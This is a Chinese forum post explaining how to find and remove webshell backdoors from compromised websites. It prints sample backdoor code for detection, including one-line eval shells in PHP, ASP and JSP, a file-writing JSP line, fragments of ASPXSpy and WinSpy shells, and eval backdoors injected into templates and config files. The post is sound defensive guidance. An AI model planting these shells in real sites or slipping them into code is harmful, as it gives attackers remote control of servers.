xxspjc | |
|
等级:管理员 |
头衔:未定义
|
帮派:未定义
|
帖数:702 |
金钱:25278 |
Y 币:577 |
注册:2010/11/29 |
|
webshell网站后门的清除方法
webshell 网站后门的清除有两种情况: (1)一种是后门的文件可以直接删除,根据云盾控制台提示的路径找到后门文件,直接删除即可。 (2)一种是不能直接删除后门文件,只能删除文件内容中的木马代码进行清除。 一、可以直接删除后门文件的4中特点 1、文件名为index.asp 、index.php,这类为自动生成SEO类型文件,可以直接删除,如要彻底清除后门,需找生成此文件的源文件。 可删除准确度99% 2、文件内容只有一行,或很少量的代码,此类被称为“一句话后门”。可直接删除准确度98%
<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%> <%eval request("pass")%> <?php @eval($_POST['pass']);?> <%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter ("f"))).write(request.getParameter("t").getBytes());%> 3、文件内容中存在password或UserPass关键字,可直接删除准确度95%。
1. <%@ LANGUAGE = VBScript.Encode %><% 2. UserPass="hack" 3. SiteURL="www.hack.com" 4. Copyright="xxxx" 5. bj="#000000" 6. wz="#ddd" 7. budu="#ddd" 8. #@~^DlYBAA==@#@&?nM\DRUmMrwDKr:W;O{,,O1,O,,Ol]+kwKxd+ $!0W+M~'DD;n=rx~3MDGD,]/;s+,1+XY=dE(PjtKh3.M`#= (0,2DM~Ptx@#@&]IjE@!4.@*@!CP4DnW{BLC-m/^Db2D)4b/DWDHR(Cm0`bB@*@!8.@*PJ,'PADDc9n/1DbwOkGU,[~J@!&l@*@!8.@*J@#@&3MD Z^nmDl"+kwW / s^Edt@#@&3U9Pq6@#@&xN,d;4=?!4~I]jv/OD*lD/2G /+ AMkO+vdDDb=2 NPUE(ls!x^YbWU~"+nmOtv? #=]nnmY4']+2smmn`USJ'JSE'-JblAx[Pw; mObW )s!x1Ok 1. <%@ LANGUAGE = VBScript.Encode %> 2. <% 3. UserPass="chen" 4. #@~^2iEBAA==@#@&P~,P,@#@&s1mh+{J9lM3~jmEMrYHPKChJid@#@&j+.-D ?1.kaYPrs+W;O{,1,O1O,1O)"+/aW d+cA;06+.xDDElr P2M.GD,I/;:n~g+aY=$W9X/G^WDxE[!T!rlwWUDZKVWM'r:,OZ/,OJlJbx3;GVKD'r:W06J=AGD[nMZGVK.'ra+J)Jr 36\.~9xraZ!!r)drx0r- +MsGUD'JMnNr):U;ZKVKDxJ:q8FE)wGDsZGsKDA%xran+E=sGM:;WV 1. <%@ Page Language="C#" Debug="true" trace="false" validateRequest="false" EnableViewStateMac="false" EnableViewState="true"%> 2. <%@ import Namespace="System.IO"%> 3. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1- transitional.dtd"> 4. <script runat="server"> 5. public string Password="d86ac8d11918df21b8b0d4918df597f0";// 6. public string vbhLn="ASPXSpy"; 7. public int TdgGU=1; 8. protected OleDbConnection Dtdr=new OleDbConnection(); 9. protected OleDbCommand Kkvb=new OleDbCommand(); 1. <%@ Page Language="C#" Debug="true" trace="false" validateRequest="false" %> 2. <%@ import Namespace="System.IO" %> 3. <script runat="server"> 4. public string Password = "d066d3a4bdec27d1e34f40ee2a972407";// 5. [color=#ff0000]public string SessionName = "WinSpy";[/color] 6. public string Bin_Action = ""; 7. public string Bin_Request = ""; 8. protected OleDbConnection conn = new OleDbConnection(); 9. protected OleDbCommand comm = new OleDbCommand();
1. <object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object> 2. <object runat=server id=oScriptlhn scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object> 3. <%@ LANGUAGE = VBScript.encode%><% 4. Server.ScriptTimeout=999999999 5. UserPass="admin" 1. <?php 2. error_reporting(7); 3. @set_magic_quotes_runtime(0); 4. 省略很多.... 5. $admin = array(); 6. $admin['check'] = true; 7. $admin['pass'] = 'bd28bb51a431e1cf83d34b785dc94c91'; 8. $admin['cookiepre'] = ''; 9. $admin['cookiedomain'] = ''; 10.$admin['cookiepath'] = '/'; 11.$admin['cookielife'] = 86400;
4、另外一些在上传组件目录或上传目录的文件可以直接删除。可直接删除准确度90% 如 eWebEditor、Editor、FCKeditor、webeditor、UploadFiles、uploads等。 二、以下几个特点的文件,不能直接删除文件,只能删除文件内容中的木马代码进行清除。 1、网站自身文件被插入恶意代码 1. 省略很多... 2. <table border="0" cellspacing="0" cellpadding="3"> 3. {assign var="col" value="1"} 4. {foreach key=tid item=enable_component from=$enable_components} 5. {if $col==1} 6. <tr> {/if} 7. <td width=""> 8. <label id="l_{$enable_component.link}"> 9. <input name="from_component[]" onclick="toggleInput('l_{$enable_component.link}')"type="checkbox" value="{$enable_component.link}" checked="checked" /> 10. {$enable_component.title}</label><?php @eval($_POST['cron']);?></td> 11. {if $col==5} </tr> {assign var="col" value="1"} {else} {math equation="x + 1" x=$col assign="col"} {/if} 12. {/foreach} 13. {if $col>1} 14. <td colspan="{math equation="x - y + 1" x=$col y=5}"> </td> 15. {/if} 16. </table> 17. 省略很多... 2、网站配置文件(当然也属于网站自身文件) 1. <% 2. Const runMode=1 3. Const sitePath="" 4. Const accessFilePath="data/data.asp" 5. Const dbType=0 6. Const databaseServer="192.168.1.11" 7. Const databaseName="aspcms" 8. Const databaseUser="aspcms" 9. Const databasepwd="aspcms" 10.Const fileExt=".html" 11.Const upLoadPath="upLoad" 12.Const waterMarkFont="hahahaha" 13.Const waterMarkPic="/images/logo.png" 14.Const waterMarkLocation="1" 15.Const smtp_usermail="aspcmstest@163.com" 16.Const smtp_user="aspcmstest" 17.Const smtp_password="aspcms.cn" 18.Const smtp_server="smtp.163.com" 19.Const messageAlertsEmail="11111111@qq.com" 20.Const slideTextStatus=1%><%Eval(Request (chr(65)))%><% 21.Const slideNum=4 22.%>
1. <%dim conn,ustr,udb 2. ustr = "Provider = Sqloledb; User ID=sa; Password=111111; Initial Catalog=dc_data; Data Source=(local);" 3. Set conn= Server.CreateObject("ADODB.Connection") 4. conn.Open ustr 5. Function yDate(ndate) 6. 省略很多... 7. %> 8. <%eval request("pass")%> 1. <?php 2. define('UC_CONNECT', 'mysql'); 3. define('UC_DBHOST', 'localhost'); 4. define('UC_DBUSER', 'root'); 5. define('UC_DBPW', '123456'); 6. define('UC_DBNAME', 'web'); 7. define('UC_DBCHARSET', 'gbk'); 8. define('UC_DBTABLEPRE', '`web1`.pre_ucenter_'); 9. define('UC_KEY', 'NbZ9v3M3vbV7K7Nbfc1bH5D3X245M7vcOb25M2L8X1H4M0696976KaL5k8N7Z35f'); 10. define('UC_API', 'http://www.xxxx.com/uc_server');eval($_POST[1]);//'); 11.?> 这类插入网站自身代码中的后门清除方法:首先备份此文件以备改错可恢复, 打开文件,查找到后门代码的位置,一般通过查找“eval、execute、request、ExecuteGlobal”关键字进行定位。 把确定为后门的代码删除后保存文件。访问网站看是否报错。已确认有没有改错。
------------------------------------------------------------------------
璇璇视频教程学习论坛,视频教程免费下载欢迎您!
|